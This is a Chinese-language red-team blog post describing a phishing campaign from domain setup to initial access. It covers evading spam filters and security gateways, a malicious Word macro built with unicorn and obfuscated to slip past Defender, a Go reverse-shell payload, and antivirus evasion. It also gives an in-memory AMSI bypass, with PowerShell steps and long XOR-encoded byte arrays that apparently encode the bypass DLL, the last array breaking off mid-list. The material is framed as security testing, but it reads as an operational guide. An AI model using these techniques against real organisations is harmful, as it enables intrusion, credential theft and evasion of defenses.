Red Team Techniques-通过钓鱼攻击获得访问权限

Red Team Techniques-通过钓鱼攻击获得访问权限

关于红队如何制作网络钓鱼攻击的帖子很多,但是大多数不是很完整。
我下面会讲我们最近的一次攻击案例,从0到获得权限,包括域名的创建,制作钓鱼攻击的手段,绕过垃圾邮件过滤器,和电子邮件网关的注意事项,生成bypass 的payload以及绕过AMSI,文章的末尾我列了一份参考文章的清单。

重要的注意事项

  • 邮件的来源
    • 使用脚本从本地发送邮件
    • headers中的ip可信度
  • 最近购买的VPS有没有发件人历史记录
  • 链接的可信度和域名的年龄
  • 使用信任度高的发件人,如Mailchimp或Sendgrid
    • 使用这些服务商来验证自己的域名,然后电子邮件就是”发件人:自己的域名“,而不是通过Mailchimp for XXX
  • 匹配目标电子邮件的返回路径
  • 配置SPF(发件人策略框架),DKIM(域名密钥识别邮件),DMARC(DMARC是一种基于现有的SPF和DKIM协议的可扩展电子邮件认证协议,在邮件收发双方建立了邮件反馈机制,便于邮件发送方和邮件接收方共同对域名的管理进行完善和监督。)
  • 时间和发送频率
    • 如果从一个可信度极低的ip一次发送100封电子邮件,基本会被标记为垃圾邮件
  • 在发送的域名和链接中有SSL证书
  • 死链接(https://www.computerhope.com/jargon/b/broken_link.htm)
  • HTML内容的数量

    远离黑名单

    你参与的时间长短决定了你对这件事情的关注度。

  • 对自动化扫描引擎的保护。如果你克隆的站点信任度很高,这一点很重要

    • Scrapers和SEG(安全电子邮件网关)可以发现Office 365和Gmail等网络钓鱼页面。
    • 为自动化平台提供正常的内容,防止被检测到。
    • 您可以使用公开的GreyNoise API中的WEB_CRAWLER标签找到网页爬虫工具列表
    • -s -XPOST -d 'tag
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      ```
      - 你也可以使用一些技术来识别headless Chrome,Selenium等环境
      - 在可信度高的域名上放我们的payload
      - SEGs 识别恶意payload的能力越来越强,如果被发现,就有可能被列入黑名单
      - 一旦被发现,再去攻击,成功率很小了,而且这次计划很有可能就得到此为止。
      - 查看这个帖子,https://posts.specterops.io/being-a-good-domain-shepherd-part-2-5e8597c3fe63,看你的域名是否如文中所说。
      - 301/302重定向到信任度高的域名
      - 您的域名可能被归类为恶意域名,因为您实际上与重定向的域名并没有什么关联。

      ## 行动
      通常来说,主要以下面三种方式处理网络钓鱼活动。
      1. 针对某个人进行针对性的活动
      2. 针对在侦查阶段收集用户信息,然后群发攻击。推荐几个资源,https://github.com/laramies/theHarvester,https://github.com/DataSploit/datasploit,https://github.com/jivoi/awesome-osint,https://medium.com/@micallst/osint-resources-for-2019-b15d55187c3f
      3. 在目标的站点提交表单,通常是建立一个假公司


      每个攻击活动都要使用不同的域名,防止相互干扰,影响信任度,攻击活动应该从微小到庞大,如果公司意识到他们是目标,你以后的活动就会收到越来越严格的审查,我们经常在验证域名和设置电子邮件身份的验证后,会使用Mailchimp传递。我们成功的使用自己的脚本,用G Suite 账户和SMTP验证。

      由于时间限制(20 hours),我们选择了选项2和3,对于这两个攻击活动,我们使用了恶意的word文档,宏攻击。

      ## 侦查
      我们通过MX查询,发现目标公司是用G suite。

dig evilwing.me MX

1
2
3
4
5
6
7
8
9
10
11

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221203000.png)

这是我自己域名的示例

Google在过滤恶意附件的方面做得很好,因此在这一系列的攻击活动中,将系列一的恶意文件放到高信任度的域名上,二则是将其放到自己的域名上。

## 攻击准备,生成word文档和payload

利用[unicorn](https://github.com/trustedsec/unicorn)生成一个恶意的powershell 宏来下载执行payload。
稍微改一下绕过Defender:

“po” & “w” & “er” & “s” & “he” & “l” & “l” & “.e” & “x” & “e” & “ “

1
我们使用[hershell](https://github.com/lesnuages/hershell)作为payload,这是用Go写的轻量级Stage,X86架构当时是无法察觉的,payload生成以后,下面就是混淆和加密,如果使用dsplit之类的东西知道目标环境,也可以手动绕过AV签名。以下是一些资源:

https://resources.infosecinstitute.com/antivirus-evasion-tools/

https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1

http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html

1
2
3
4
msf5最近也增加了两个免杀模块。

## AMSI绕过
要执行我们的powershell代码,就得绕过微软亲儿子。WD。WD可以防恶意软件的接口,powershell在执行前会向扫描引擎提交内容,然后分析。幸好[cyberark](https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/)之前研究过关于这东西的免杀,被微软标记为使用XOR绕过免杀。

  1. Re-compile the AMSI Bypass DLL
  2. Convert the binary to base64
    $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes(“$pwd\bypass.dll”))
  3. XOR encrypt
    foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 }
  4. Print encrypted buf as a byte array
    foreach($byte in $encrypted){ Write-Host -nonewline “$byte,” }

On Target

  1. Split encrypted buf due to powershell line limit lengths
  2. Concat the buf
    $xorencrypted = $a + $b + $c + $d + $e + $f + $g
  3. Decrypt the buf
    foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }
  4. Get buf as base64
    $base64string = [Text.Encoding]::UTF8.GetString($decrypted)
  5. Load the DLL using reflection
    function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]”Bypass.AMCEE”).Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }
  6. Call the bypass method
    Bypass-AMCEE
    1
    2
    这允许我们在内存中执行payload,比如Mimikatz
    AMSI 的bypass:https://gist.github.com/jkamdjou/fcba44227cda85eb8829ee43646c6c77

$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,77,102,115,64,64,67,81,64,64,64,64,64,68,64,64,64,70,102,69,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,118,64,64,64,66,64,74,102,64,64,73,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,72,64,64,64,66,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,66,64,64,64,68,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,52,49,91,89,105,49,64,64,64,64,70,64,118,64,64,64,64,102,64,64,64,64,69,102,64,64,64,64,72,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,64,64,64,70,64,116,98,111,79,120,88,118,64,64,64,70,102,69,64,64,64,64,80,64,64,64,64,64,80,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,64,64,64,67,64,77,111,75,109,99,70,56,107,64,64,64,76,64,64,64,64,64,70,64,64,64,64,64,66,64,64,64,64,71,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,64,64,80,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,69,114,74,118,64,64,64,64,64,64,64,68,102,64,64,64,64,66,64,64,84,64,74,66,68,64,64,71,102,75,64,64,64,67,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,76,118,67,64,69,69,64,64,64,64,64,80,64,64,68,80,67,120,64,80,64,64,98,66,102,80,64,64,64,74,64,73,72,83,64,64,67,118,74,64,72,64,64,64,88,74,67,111,53,83,64,64,64,74,74,67,72,64,64,64,110,85,67,105,68,70,77,64,106,64,71,121,76,73,78,72,57,64,64,64,64,70,98,104,76,64,64,73,64,110,64,80,64,64,67,102,114,73,103,105,68,64,64,64,110,110,68,102,64,64,66,105,76,72,68,80,102,114,67,102,64,89,68,118,98,115,99,67,117,112,74,67,76,64,64,64,110,76,71,102,49,73,66,67,56,64,68,102,76,110,64,118,64,64,67,105,99,42,64,83,76,75,68,80,106,114,67,102,64,89,68,118,98,115,82,67,108,79,71,102,64,64,64,82,89,80,64,80,64,64,67,66,102,84,64,64,64,74,68,118,80,91,74,67,84,64,64,64,110,85,67,83,68,68,71,105,68,71,70,82,102,86,64,64,64,74,64,64,98,103,70,120,102,89,64,64,64,74,68,80,84,91,74,64,80,64,64,64,88,64,98,106,68,64,64,73,64,110,68,64,64,64,66,102,64,86,68,118,98,115,64,67,68,73,74,104,72,66,74,67,102,64,64,64,110,64,74,106,75,85,82,106,72,67,64,64,68,64,64,64,64,64,64,64,118,64,64,64,67,51,79,66,53,118,77,107,76,118,76,123,68,52,64,64,64,64,64,64,84,64,99,64,64,64,64,67,118,69,64,64,64,107,103,102,64,64,104,64,76,64,64,81,102,69,64,64,64,107,84,50,83,120,96,86,52,111,98,118,64,64,64,64,66,64,67,118,64,64,88,64,64,64,64,66,79,87,84,118,69,102,67,118,64,64,68,64,64,64,64,66,79,73,87,84,109,68,64,64,64,64,57,64,98,64,64,70,102,67,64,64,64,107,80,108,121,119,88,102,64,64,64,64,64,64,64,64,64,66,64,64,64,67,87,52,84,66,79,64,106,66,64,64,64,64,42,102,68,123,64,67,88,64,64,64,68,64,64,64,64,96,64,64,64,64,67,64,64,64,64,64,68,64,64,64,64,70,64,64,64,64,66,102,64,64,64,67,102,64,64,64,64,81,64,64,64,64,64,80,64,64,64,64,68,64,64,64,64,66,64)

$b = @(64,64,64,67,64,64,64,64,64,68,64,64,64,64,67,64,64,64,64,64,80,64,64,64,64,68,64,64,64,64,64,64,75,118,66,64,80,64,64,64,64,64,64,67,102,69,68,64,83,68,69,67,102,64,121,64,105,68,69,67,102,69,53,64,79,57,66,69,118,64,121,64,118,64,64,67,102,64,102,64,96,53,66,67,102,66,111,64,96,53,66,67,102,66,72,64,96,53,66,67,102,64,88,64,112,53,66,67,102,69,106,64,96,53,66,67,102,69,56,64,96,53,66,67,102,64,50,64,96,53,66,67,102,64,76,64,103,72,66,67,102,69,112,64,81,72,66,67,102,67,115,64,96,53,66,67,102,67,82,64,86,64,66,67,102,67,119,64,55,98,66,67,102,69,81,64,67,68,69,67,102,69,71,64,74,98,66,67,102,66,101,64,74,98,66,67,102,69,88,64,112,98,66,67,102,69,89,64,112,98,66,67,102,67,81,64,112,98,66,67,102,67,64,64,121,68,69,67,102,69,68,64,55,98,66,67,102,66,74,64,74,98,66,67,102,66,73,64,119,72,66,64,64,64,64,64,66,88,64,64,64,64,64,64,64,68,64,64,80,64,67,64,67,64,64,101,118,67,81,64,49,68,64,64,80,64,67,64,64,64,67,64,64,64,119,64,64,64,64,80,80,64,67,64,64,98,64,68,118,68,64,64,64,110,64,64,64,67,75,64,64,72,64,67,118,64,123,64,84,53,64,88,64,64,64,64,64,64,64,102,64,66,86,72,71,88,69,91,64,64,67,64,64,64,64,64,64,66,64,64,75,88,102,123,118,79,112,64,64,76,64,64,64,64,64,64,72,64,64,109,104,66,71,64,51,57,64,67,64,64,64,64,64,64,64,102,64,66,83,72,79,53,69,100,64,64,72,64,71,64,102,64,64,64,64,64,75,88,64,115,80,79,46,64,64,114,64,73,120,68,64,64,64,64,64,105,105,107,83,64,102,88,64,66,118,64,64,64,64,68,64,113,80,64,64,64,64,72,64,115,80,64,64,64,64,68,64,117,102,64,64,64,64,68,64,91,80,76,64,64,64,72,64,87,64,72,64,64,64,76,64,109,64,76,66,64,64,80,64,101,102,76,64,64,64,68,64,117,80,76,64,64,64,72,64,105,102,64,64,64,64,76,64,86,118,72,75,64,79,68,66,64,80,64,83,64,79,68,66,67,102,64,91,64,79,68,66,66,102,64,113,64,79,68,66,68,64,64,121,64,79,68,66,68,64,64,52,64,79,68,66,68,64,67,67,64,79,68,66,68,64,67,75,64,79,68,66,68,64,67,83,64,79,68,66,68,64,67,91,64,79,68,66,68,64,67,105,64,79,68,66,71,80,67,113,64,79,68,66,68,64,67,121,64,79,68,66,68,64,67,52,64,79,68,66,68,64,66,75,64,79,68,66,67,102,66,91,64,77,114,64,74,64,66,105,64,76,118,66,77,80,66,105,64,78,106,69,76,64,66,113,64,74,68,69,79,102,66,52,64,77,110,69,78,118,69,83,64,73,110,66,80,118,69,83,64,76,110,69,82,64,66,105,64,76,64,66,84,80,66,67,64,79,68,66,67,102,64,116,64,64,114,64,102,118,64,116,64,67,76,64,107,64,64,116,64,67,114,64,112,118,64,116,64,66,76,64,117,64,64,116,64,66,114,64,118,64,64,116,64,69,76,64,118,64,64,116,64,69,114,64,118,64,64,116,64,68,76,64,117,64,64,116,64,68,114,64,121,102,64,116,64,71,76,64,118,64,64,116,64,71,114,64,118,64,64,116,64,70,76,64,50,102,64,116,64,70,114,64,66,64,68,116,64,73,76,64,71,80,71,107,64,73,114,64,88,118,68,67,64,64,76,64,64,64,64,68,64,67,110,64,64,80,66,81,64,102,64,67,64,118,67,86,64,118,68,64,64,64,68,71,64,76,57,69,64,80,64,64,64,80,98,64,105,80,76,67,64,64,64,67,66,80,69,99,64,118,72,64,68,66,118,64,64,64,68,64,67,72,64,64,64,64,68,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,85,118,76,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,71,98,64,103,80,64,64,64,64,64,64,67,64,64,69,64,64,64,64,64,64,64,64,96,51,87,120,99,108,87,114,76,123,72,64,89,48,56,85,101,70,71,49,96,86,79,67,98,111,75,105,100,84,109,116,96,89,83,84,100,89,67,109,84,51,109,55,91,85,49,123,64,69,121,79,99,51,83,48,99,70,84,42,64,69,121,80,98,108,109,51,88,89,83,109,82,86,48,118,99,70,87,117,91,86,52,49,88,89,83,113,99,51,52,68,91,89,83,105,96,86,121,123,81,102,64,48)

$c = @(76,84,79,67,83,106,72,49,78,69,68,123,78,84,72,118,76,106,84,118,79,107,71,68,79,69,106,121,78,84,76,48,76,85,98,51,79,107,72,121,80,106,88,53,79,49,83,67,80,49,87,68,64,68,71,79,80,49,87,71,64,70,48,123,88,51,56,120,99,70,109,104,64,73,79,120,88,118,67,82,101,86,52,49,96,86,48,109,83,108,109,109,99,70,83,72,88,86,52,106,99,70,84,64,80,51,56,116,98,51,56,114,91,80,67,110,85,86,56,106,101,86,121,109,64,73,67,120,99,51,79,78,88,86,48,109,64,70,52,105,99,86,84,64,87,50,75,113,101,70,87,76,96,86,52,109,64,71,91,105,99,73,87,109,87,73,109,118,91,80,67,69,99,51,48,118,96,86,121,109,98,106,101,109,99,108,87,120,88,89,83,109,91,68,71,49,101,73,75,113,88,111,87,49,91,80,67,73,101,86,109,106,80,89,83,49,98,108,109,104,101,89,83,109,64,68,83,109,88,111,87,111,91,51,71,104,99,70,87,67,101,73,83,120,96,86,75,48,101,70,84,64,80,51,56,117,87,108,109,123,96,86,75,114,91,84,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,87,83,113,101,70,121,109,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,87,73,75,105,91,70,87,117,88,89,75,115,80,89,83,49,98,108,109,104,101,89,83,109,64,71,83,105,98,108,101,109,101,68,91,120,88,86,48,109,101,51,56,120,96,49,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,84,91,113,99,70,87,86,91,89,75,123,96,86,56,116,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,116,91,108,109,111,101,89,75,105,101,70,109,119,99,106,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,84,83,109,98,51,79,120,96,89,67,49,96,86,56,116,80,89,83,49,98,108,109,104,101,89,83,109,64,68,79,119,99,89,67,113,99,70,71,49,96,86,56,116,84,108,87,114,88,89,105,105,101,70,109,119,99,111,79,67,101,73,83,120,96,86,75,48,101,70,84,64,80,89,79,123,91,86,48,104,99,73,109,80,98,108,56,106,101,86,79,49,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,118,100,89,75,113,91,51,105,49,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,117,98,70,71,116,100,84,71,49,101,73,75,113,88,111,87,49,91,80,67,82,101,86,52,49,96,86,48,109,80,51,56,117,98,70,71,49,96,86,75,113,99,70,109,49,100,84,71,49,101,73,75,113,88,111,87,49,91,80,67,66,100,89,83,109,64,70,83,50,84,51,109,55,91,80,67,123,96,89,113,109,64,71,79,52,98,50,83,109,99,82,52,82,101,86,52,49,96,86,48,109,77,109,91,109,98,111,79,113,99,51,52,113,99,108,98,64,80,86,121,114,99,51,79,72,83,51,121,119,88,108,71,114,64,68,48,105,98,111,79,110,88,86,118,64,82,51,87,120,99,108,87,114,76,123,72,116,91,70,121,114,64,68,75,52,98,70,71,123,98,120,52,106,99,70,118,64,84,50,109,123,101,70,87,117,64,71,79,52,98,50,83,109,99,82,52,82,91,86,91,114,91,86,79,49,96,86,56,116,64,70,56,118,89,49,71,106,91,70,109,49,96,86,56,116,64,71,113,109,98,108,57,64,77,108,79,49,99,50,72,64,87,84,109,116,101,71,67,49,98,102,67,85,100,89,79,49,91,86,49,116,83,70,109,105,91,51,52,119,98,50,83,113,88,50,76,64,84,50)

$d = @(109,123,101,70,87,117,77,109,75,48,99,111,83,113,99,86,84,116,82,86,52,49,91,89,75,119,98,71,79,109,98,111,91,113,88,51,87,123,64,71,79,52,98,50,83,109,99,82,52,82,101,86,52,49,96,86,48,109,77,106,79,119,99,89,67,113,99,70,87,120,84,51,87,120,101,108,109,107,91,89,76,64,83,70,87,104,101,86,101,111,96,86,52,111,85,86,56,106,91,89,76,64,84,111,87,116,101,70,109,117,91,84,105,109,99,73,67,109,98,111,76,64,80,111,109,118,88,89,79,123,64,68,101,109,101,71,67,120,99,51,79,67,91,70,83,120,91,89,79,123,64,70,121,118,80,86,83,106,98,108,87,123,98,118,67,81,88,108,113,109,88,50,80,64,99,73,67,108,99,68,56,114,91,71,67,120,99,50,83,109,88,50,80,64,87,108,109,120,101,73,87,105,99,71,67,120,99,50,83,109,88,50,80,64,91,108,121,78,91,89,101,80,98,108,56,49,91,86,79,49,64,70,56,118,89,49,87,53,98,70,121,113,88,51,109,49,64,71,79,48,88,111,91,109,98,111,80,64,91,70,87,123,101,64,67,75,99,108,109,49,96,86,71,114,96,89,113,109,80,89,75,120,88,89,106,64,80,51,56,118,100,80,67,76,99,51,71,106,85,70,109,104,98,108,71,120,100,80,67,82,101,70,121,79,99,50,91,109,85,86,87,117,99,50,75,52,64,70,56,118,89,49,87,121,101,86,71,114,96,89,83,52,64,64,64,64,64,64,64,81,84,102,67,48,64,70,53,64,99,102,67,113,64,70,53,64,91,118,64,64,68,86,68,64,99,80,67,123,64,70,106,64,77,102,67,106,64,70,118,64,99,64,64,64,73,84,68,64,99,80,67,123,64,70,106,64,84,118,67,107,64,70,68,64,99,102,67,66,64,73,84,64,91,102,67,108,64,70,84,64,98,102,64,64,73,89,64,64,88,80,67,49,64,70,76,64,96,64,64,102,64,70,68,64,98,64,67,118,64,70,118,64,96,80,67,109,64,70,80,64,77,102,64,64,64,74,119,84,84,119,53,96,78,51,109,81,114,49,55,107,110,114,66,114,78,74,118,64,67,66,64,67,64,80,102,69,72,64,64,67,67,82,64,67,64,83,68,83,67,66,64,67,64,80,53,68,72,64,68,67,64,102,49,73,66,105,102,88,70,80,106,101,67,83,102,66,66,64,72,66,67,64,64,67,64,80,53,66,67,105,102,71,64,64,72,66,70,67,102,68,64,64,68,91,66,118,98,64,64,102,68,82,88,83,71,109,67,64,64,67,70,64,102,72,64,64,80,67,73,80,84,72,70,64,102,71,64,64,72,88,70,64,102,72,117,50,113,98,87,105,106,49,53,72,106,69,67,105,68,80,67,80,64,66,70,67,102,78,67,64,64,67,70,64,53,72,64,64,80,66,70,67,106,75,68,64,106,70,64,64,76,67,70,67,102,72,64,118,64,64,66,64,102,67,64,64,102,64,64,64,64,64,64,67,53,67,64,64,68,64,87,64,72,86,87,50,75,105,98,68,52,119,99,106,87,53,88,51,87,118,101,70,109,119,99,109,83,110,98,108,56,50,98,118,68,72,64,80,64,73,64,80,64,64,64,64,64,77,64,80,64,70,80,111,109,118,88,89,79,123,64,64,64,71,64,80,64,64,64,64,64,89,64,80,64,82,80,51,56,118,100,89,75,113,91,51,105,49,72,76,74,113,72,66,64,120,76,69,68,52,64,64,64,113,64,80,64,106,88,123,68,120,88,123,88,53,76,108,88,117,79,85,67,106,76,82,49,49,76,107,88,48,77,85,106,50,88,86,84,117,79,69,84,123,79,123,76,48,91,86,75,108,88,86,80,123,64,64,64,76,64,80,64,73,76,82,53,118,77,107,64,116,76,64,64,64,85,80,68,64,73,66,52,78,83,87,83,70,98,108,71,117,91,89,101,119,98,108,114,114,87,108,87,120,98,51,109,119,99,107,48,51,79,66,53,48,77,107,72,67,64,71,80,78,71,68,91,120,88,86,48,109,101,51,56,120,96,49,83,113,98,50,67,114,88,89,109,78,88,86,48,109,71,66,52,78,83,87,80,102,83,111,75,105,99,86,87,50,99,50,75,115,72,69,80,116,79,82,53,120,67,64,68,64,64,64,64,64,64,64,64,64,116,49,72,116,89,64,64,64,64,64,64,66,64,64,64,64,73,64,68,64,64,75,118,112,64,64,66,98,69,64,64,64,84,109,79,68,84,123,51,67,98,101,66,73,66,74,83,76,111,54,117,91,68,115,112,76,103,68,114,67,64,64,64,64,80,123,113,98,87,89,79,109,98,111,79)

$e = @(98,96,108,56,123,96,71,121,68,99,51,79,48,99,86,87,116,101,73,79,98,87,108,109,123,101,86,71,114,72,71,79,49,101,86,83,113,99,120,64,120,76,69,68,50,89,71,67,120,99,51,113,109,88,50,83,123,89,68,75,52,98,70,71,123,98,48,121,66,100,89,67,105,98,50,79,98,99,51,75,112,89,68,83,109,88,111,87,111,89,68,75,52,98,70,71,123,98,120,52,118,91,70,72,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,69,102,74,118,64,64,64,64,64,64,64,64,64,64,64,64,69,55,74,118,64,64,64,66,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,54,66,114,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,103,80,51,56,120,83,70,121,114,85,86,71,113,99,102,67,117,98,51,79,119,98,108,87,109,77,108,83,114,99,64,64,64,64,64,64,64,46,120,84,64,72,64,64,80,76,103,42,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64)

$f = @(64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,80,64,64,64,64,70,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,67,64,64,64,64,76,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,82,64,64,64,64,71,105,64,64,64,64,76,64,118,64,64,64,64,64,64,64,64,64,64,64,64,64,76,64,123,80,64,64,64,67,86,64,71,76,64,89,118,67,86,64,68,84,64,84,102,67,85,64,68,106,64,85,118,67,78,64,71,57,64,82,80,67,78,64,68,88,64,85,118,64,64,64,64,64,64,119,80,85,119,46,102,64,64,64,80,64,64,64,64,68,64,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,81,118,64,64,64,64,64,64,64,64,64,68,64,64,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,68,80,64,64,64,64,67,64,71,88,64,88,80,67,120,64,68,88,64,96,80,67,114,64,70,84,64,82,80,67,116,64,70,88,64,99,118,64,64,64,64,64,64,75,64,64,68,64,64,64,64,87,64,67,120,64,70,68,64,99,102,67,123,64,70,118,64,88,80,67,49,64,70,106,64,99,118,67,116,64,64,64,64,64,64,64,64,64,77,64,68,99,64,72,64,64,64,68,64,84,118,67,49,64,73,72,64,96,80,67,116,64,70,98,64,83,102,67,113,64,70,118,64,91,80,67,75,64,70,53,64,91,102,67,119,64,64,64,64,82,64,72,64,64,64,68,64,76,64,64,118,64,69,64,64,76,64,64,118,64,69,80,64,88,102,64,118,64,64,64,64,70,102,64,67,64,64,68,64,80,118,67,119,64,70,49,64,99,80,67,109,64,70,53,64,101,64,67,123,64,64,64,64,64,64,64,64,64,66,72,64,64,80,64,67,64,68,76,64,99,118,67,117,64,73,64,64,88,80,67,116,64,73,106,64,85,102,67,105,64,70,49,64,91,80,64,64,64,64,64,64,64,64,64,64,64,69,88,64,67,118,64,67,64,68,88,64,96,80,67,114,64,70,84,64,83,64,67,109,64,73,76,64,88,118,67,120,64,70,106,64,98,64,67,49,64,70,106,64,99,118,67,116,64,64,64,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,64,64,64,64,64,76,64,64,72,64,64,68,64,83,102,67,113,64,70,118,64,91